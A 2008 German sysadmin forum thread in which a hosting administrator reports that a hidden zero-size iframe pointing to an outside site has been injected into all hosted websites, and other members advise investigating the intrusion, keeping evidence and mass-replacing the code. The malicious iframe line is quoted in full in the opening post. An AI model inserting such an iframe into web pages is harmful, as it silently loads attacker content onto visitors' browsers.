Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Auf dem Webserver hat sich ein gefährlicher Code eingeschlichen

Mitglied: beaxx

beaxx (Level 1) - Jetzt verbinden

31.03.2008, aktualisiert 15:38 Uhr, 3635 Aufrufe, 7 Kommentare

Hallo,

Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen

<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>

jetzt meine Frage

Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren

frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden


danke in voraus

mfg
Mitglied: 60730
31.03.2008 um 10:00 Uhr
Frage 3:
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit Windows Boardsuche.

Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:08 Uhr
Frage 3:
Was ist das für ein Webserver und 3b)
wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit
Windows Boardsuche.

Nicht einfach löschen, sondern
rausfinden, wie er auf dein System gekommen
ist - das ist deine Aufgabe!

Windows 2000 Server
tja das ist eine gute frage muß von ausserhalb irgendwie draufgekommen sein

tja herausfinden ist so eine sache der code gehört dringend von allen websiten entfernd dann kann ich mich drum kümmern wie er draufgekommen ist bei einer manuellen löschung sitz ich einen tag dabei
Bitte warten ..
Mitglied: Gahmuret
31.03.2008 um 10:18 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine Kopie der infizierten Seiten erstellen um sie zu analysieren.
Spiel doch einfach die Sicherung der Webseiten über die infizierten.

Schöne Grüße
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:29 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine
Kopie der infizierten Seiten erstellen um sie
zu analysieren.
Spiel doch einfach die Sicherung der
Webseiten über die infizierten.

Schöne Grüße

Kopie hab ich schon erstellt ich werd mich nachher auch dann ausführlich beschäftigen was der überhaupt macht nur wie ich schon gesagt hab gehört er dringend von allen websiten so schnell wie möglich entfernd
tja die sicherung einspielen an das hab ich auch schon gedacht nur ich dachte es gäbe eine einfachere lösung weils eh immer der selbe code ist der zum entfernen ist

viele grüße
Bitte warten ..
Mitglied: 60730
31.03.2008 um 10:39 Uhr
ich dachte es
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist

viele grüße

Hi,

geh mit dem Explorer auf den Webroot und drücke [F3] suchen:

Nach dateien suchen, deren inhalt "widht=0 height=0></iframe>" ist und durch den ganzen Baum suchen lassen, die Fundstellen ansehen. Wenn "nur" hker.htm darunter ist - diese htm. Datei umbenennen, dann "passiert" nicht mehr viel. Wenn du Sie löscht, kannst du nicht mehr rausfinden, wer und wann die Datei raufgespielt hat.

Nun rausfinden, wann diese Datei auf dem Server gelandet ist und ganz genau nachforschen, was wer und wie diese Datei auf die Maschine gekommen ist.
Dann kannste die auch löschen.
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 14:31 Uhr
Hallo,

sodale jetzt hab ich nochmal nachgeschaut mit sicherung einspielen is nicht leider ist die letzte sicherung schon zu lange aus das das einspielen keinen sinn macht

ich hab mal eine website kopiert um nachher nachforschungen anzustellen wie was wo das herkommt

jetzt bräucht ich nur ein tool wie ich denn code von denn restlichen websiten weg bekomme
es sind html , aspx vb und dll datein betroffen anonst werd ich wohl eine woche brauchen bis ich denn code von jeder website händisch entferne

bin für jeden hinweis dankbar

mfg
Bitte warten ..
Mitglied: 60730
31.03.2008 um 15:38 Uhr
Hi,

du liesst offensichtlich meine Postings nicht richtig?

Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.

Ist es immer die gleiche Datei - die den Iframe ausmacht?

Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:

http://www.inforapid.de/html/srdownload.htm

diesem Link gibts ein Such und Ersetz Werkzeug.

Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt

Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.
Bitte warten ..
Ähnliche Inhalte
Windows Server

Webserver: ausgelieferten HTML-Code verkleinern

gelöst Frage von petereWindows Server3 Kommentare

Hallo, ich habe einen IIS auf einem Windows 2012R2 mit einer ASP.NET Seite (.aspx-Dateien) laufen und möchte den ausgelieferten ...

Netzwerke

Auffälliger IP-Scan - Gefährlich?

gelöst Frage von PostitNetzwerke13 Kommentare

Hallo @ all Admins, ich weiß grad nicht ob ich mir selber grad im weg stehe oder ob das ...

Firewall

Kann man gefährliche Websites mit Digitalisierungsbox Standard sperren?

gelöst Frage von SinzalFirewall7 Kommentare

Hallo Admins, ein Kunde von mir hat eine Digitalisierungsbox Standard der Telekom im Einsatz als Webrouter, auf dem er ...

Windows Server

Gefährlich wenn DC und Exchange an direkter Internetverbindung

Frage von technikdealerWindows Server7 Kommentare

Hay Ihr. Ich würde mir gerne einen Server mieten um dort einen DC samt Exchange zu installieren. Leider hat ...

Neue Wissensbeiträge
SAN, NAS, DAS
QNAP NAS Datenschutz-Loop nach Firmware-Update
Tipp von vanTast vor 20 StundenSAN, NAS, DAS2 Kommentare

Moin, im allgemeinen Trend seine geänderten Datenschutzbedingungen den Kunden zukommen zu lassen kam die Firma QNAP auf die glorreiche ...

Datenschutz
DSGVO Datenschutzgesetz
Anleitung von 1Werner1 vor 22 StundenDatenschutz4 Kommentare

Moin, ja was ist das, da ist die DSGVO Datenschutzverordnung. Wie das Gesetz gibt es schon 2 Jahre? Nun ...

CPU, RAM, Mainboards

Neverending Story: Google und Microsoft melden neue Chip-Sicherheitslücke

Information von keine-ahnung vor 1 TagCPU, RAM, Mainboards1 Kommentar

Da kommt man mit dem fixen gar nicht mehr hinterher und die CPU erreichen wieder Rechenleistungen im Bereich des ...

Multimedia & Zubehör
AVM Fritz USB WLAN Sticks schneller einschalten
Tipp von NetzwerkDude vor 3 TagenMultimedia & Zubehör4 Kommentare

Die AVM Fritz WLAN Sticks haben in der Firmware 2 Modis: Einmal als Massenspeicher und einmal als WLAN Netzwerkkarte ...

Heiß diskutierte Inhalte
LAN, WAN, Wireless
Powerline über zwei Stockwerke optimieren
gelöst Frage von DultusLAN, WAN, Wireless43 Kommentare

Guten Morgen liebes Forum, ich hätte einmal eine Frage bezüglich Powerline Adapter: Mein Problem ist seit gestern präsent, da ...

Windows Userverwaltung
Problem mit Benutzerprofil
Frage von lieferscheinWindows Userverwaltung24 Kommentare

Guten Tag liebe Community, folgendes Problem habe ich: User meldet sich auf Client A an - sein Homelaufwerk verbindet. ...

Rechtliche Fragen
DISKUSSION: Was bringt der Disclaimer "Wenn Sie nicht der Empfänger sind."
Frage von N8DragonRechtliche Fragen21 Kommentare

So oder ähnlich, lese ich immer wieder Kleingedrucktes am Ende diverser Mails. Letzten Endes wollen sie mir alle sagen, ...

Rechtliche Fragen
DSGVO - Impressum und Datenschutz auf Anmeldeseiten notwendig?
Frage von StefanKittelRechtliche Fragen20 Kommentare

Hallo, was mit gerade eingefallen ist. Muss man auf Anmeldeseiten auch ein Impressum und Datenschutzhinweis haben? Auch hier wird ...